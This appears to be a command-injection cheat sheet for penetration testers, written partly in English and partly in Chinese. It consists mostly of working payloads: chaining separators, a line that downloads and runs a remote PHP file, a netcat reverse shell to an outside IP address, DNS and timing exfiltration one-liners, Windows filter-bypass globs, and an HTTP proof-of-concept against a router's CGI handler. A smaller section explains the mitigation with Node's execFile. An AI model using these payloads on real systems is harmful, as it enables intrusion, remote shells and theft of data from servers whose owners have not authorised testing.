Command Injection

Reading time: 8 minutes

What is command Injection?

A command injection permits the execution of arbitrary operating system commands by an attacker on the server hosting an application. As a result, the application and all its data can be fully compromised. The execution of these commands typically allows the attacker to gain unauthorized access or control over the application's environment and underlying system.

上下文

根据你的输入被注入的位置，你可能需要在命令之前终止被引号包围的上下文（使用 " 或 '）才能执行命令。

Command Injection/Execution

#Both Unix and Windows supported
ls||id; ls ||id; ls|| id; ls || id # Execute both
ls|id; ls |id; ls| id; ls | id # Execute both (using a pipe)
ls&&id; ls &&id; ls&& id; ls && id #  Execute 2º if 1º finish ok
ls&id; ls &id; ls& id; ls & id # Execute both but you can only see the output of the 2º
ls %0A id # %0A Execute both (RECOMMENDED)
ls%0abash%09-c%09"id"%0a   # (Combining new lines and tabs)

#Only unix supported
`ls` # ``
$(ls) # $()
ls; id # ; Chain commands
ls${LS_COLORS:10:1}${IFS}id # Might be useful

#Not executed but may be interesting
> /var/www/html/out.txt #Try to redirect the output to a file
< /etc/passwd #Try to send some input to the command

Limition Bypasses

如果你试图在 linux 机器内执行任意命令，你会有兴趣阅读有关这些 Bypasses:

Bypass Linux Restrictions

Examples

vuln=127.0.0.1 %0a wget https://web.es/reverse.txt -O /tmp/reverse.php %0a php /tmp/reverse.php
vuln=127.0.0.1%0anohup nc -e /bin/bash 51.15.192.49 80
vuln=echo PAYLOAD > /tmp/pay.txt; cat /tmp/pay.txt | base64 -d > /tmp/pay; chmod 744 /tmp/pay; /tmp/pay

参数

以下是可能易受 code injection 和类似 RCE vulnerabilities 影响的前 25 个参数（来自 link):

?cmd={payload}
?exec={payload}
?command={payload}
?execute{payload}
?ping={payload}
?query={payload}
?jump={payload}
?code={payload}
?reg={payload}
?do={payload}
?func={payload}
?arg={payload}
?option={payload}
?load={payload}
?process={payload}
?step={payload}
?read={payload}
?function={payload}
?req={payload}
?feature={payload}
?exe={payload}
?module={payload}
?payload={payload}
?run={payload}
?print={payload}

Time based data exfiltration

提取数据：逐字符

swissky@crashlab▸ ~ ▸ $ time if [ $(whoami|cut -c 1) == s ]; then sleep 5; fi
real    0m5.007s
user    0m0.000s
sys 0m0.000s

swissky@crashlab▸ ~ ▸ $ time if [ $(whoami|cut -c 1) == a ]; then sleep 5; fi
real    0m0.002s
user    0m0.000s
sys 0m0.000s

DNS based data exfiltration

基于来自 https://github.com/HoLyVieR/dnsbin 的工具，也托管在 dnsbin.zhack.ca

1. Go to http://dnsbin.zhack.ca/
2. Execute a simple 'ls'
for i in $(ls /) ; do host "$i.3a43c7e4e57a8d0e2057.d.zhack.ca"; done

$(host $(wget -h|head -n1|sed 's/[ ,]/-/g'|tr -d '.').sudo.co.il)

用于检测基于 DNS 的 data exfiltration 的在线工具：

• dnsbin.zhack.ca
• pingb.in

过滤绕过

Windows

powershell C:**2\n??e*d.*? # notepad
@^p^o^w^e^r^shell c:**32\c*?c.e?e # calc

Linux

Bypass Linux Restrictions

Node.js child_process.exec vs execFile

在审计 JavaScript/TypeScript 后端时，你经常会遇到 Node.js 的 child_process API。

// Vulnerable: user-controlled variables interpolated inside a template string
const { exec } = require('child_process');
exec(`/usr/bin/do-something --id_user ${id_user} --payload '${JSON.stringify(payload)}'`, (err, stdout) => {
/* … */
});

exec() 会生成一个 shell (/bin/sh -c)，因此任何对 shell 有特殊含义的字符（反引号, ;, &&, |, $(), …）在将用户输入拼接到字符串时，都会导致 command injection。

缓解： 使用 execFile()（或在没有 shell 选项的情况下使用 spawn()）并将 每个参数作为独立的数组元素 提供，这样就不会涉及 shell：

const { execFile } = require('child_process');
execFile('/usr/bin/do-something', [
'--id_user', id_user,
'--payload', JSON.stringify(payload)
]);

Real-world case: Synology Photos ≤ 1.7.0-0794 was exploitable through an unauthenticated WebSocket event that placed attacker controlled data into id_user which was later embedded in an exec() call, achieving RCE (Pwn2Own Ireland 2024).

通过前导连字符的参数/选项注入 (argv, no shell metacharacters)

并非所有注入都需要 shell 元字符。如果应用将不受信任的字符串作为参数传递给系统工具（即使使用 execve/execFile 且没有 shell），许多程序仍会将以 - 或 -- 开头的参数解析为选项。这样攻击者就能切换模式、修改输出路径或触发危险行为，而无需进入 shell。

常见场景：

• 嵌入式 web UIs/CGI 处理程序，它们构建诸如 ping <user>、tcpdump -i <iface> -w <file>、curl <url> 等命令。
• 集中式 CGI 路由器（例如具有选择器参数 topicurl=<handler> 的 /cgi-bin/<something>.cgi），多个处理程序重用相同的弱验证器。

可尝试的方法：

• 提供以 -/-- 开头的值，让下游工具将其作为标志解析。
• 滥用会改变行为或写文件的标志，例如：
• ping: -f/-c 100000 用于压垮设备（DoS）
• curl: -o /tmp/x 用于写入任意路径，-K <url> 用于加载攻击者控制的配置
• tcpdump: -G 1 -W 1 -z /path/script.sh 在不安全的包装器中实现轮转后执行
• 如果程序支持 -- 作为 end-of-options，尝试绕过那些在错误位置添加 -- 的简单缓解措施。

针对集中式 CGI 分发器的通用 PoC 形态：

POST /cgi-bin/cstecgi.cgi HTTP/1.1
Content-Type: application/x-www-form-urlencoded

# Flip options in a downstream tool via argv injection
topicurl=<handler>&param=-n

# Unauthenticated RCE when a handler concatenates into a shell
topicurl=setEasyMeshAgentCfg&agentName=;id;

Brute-Force 检测列表

Auto_Wordlists/wordlists/command_injection.txt at main \xc2\xb7 carlospolop/Auto_Wordlists \xc2\xb7 GitHub

参考资料

• https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection
• https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection
• https://portswigger.net/web-security/os-command-injection
• Extraction of Synology encrypted archives – Synacktiv 2025
• PHP proc_open manual
• HTB Nocturnal: IDOR → Command Injection → Root via ISPConfig (CVE‑2023‑46818)
• Unit 42 – TOTOLINK X6000R: Three New Vulnerabilities Uncovered